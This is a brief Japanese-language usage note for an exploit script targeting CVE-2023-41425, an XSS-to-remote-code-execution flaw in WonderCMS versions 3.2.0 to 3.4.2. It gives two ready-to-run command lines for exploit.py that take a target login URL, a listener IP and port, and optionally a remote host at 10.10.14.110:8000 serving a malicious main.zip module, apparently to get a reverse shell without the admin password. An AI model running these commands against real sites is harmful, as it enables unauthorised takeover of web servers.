
WonderCMS RCE CVE-2023-41425
XSS 脆弱性を抱える WonderCMS バージョン v3.2.0 から v3.4.2 では、悪意のある攻撃者が installModule CVE-2023-41425 にコンポーネントをアップロードすることで RCE を達成できます(パスワードを知る必要はありません)。
main.zip ファイルのダウンロード元となるリモートホストを指定する場合
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
または main.zip ファイルを指定しない場合。デフォルトでは main.zip からダウンロードします
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
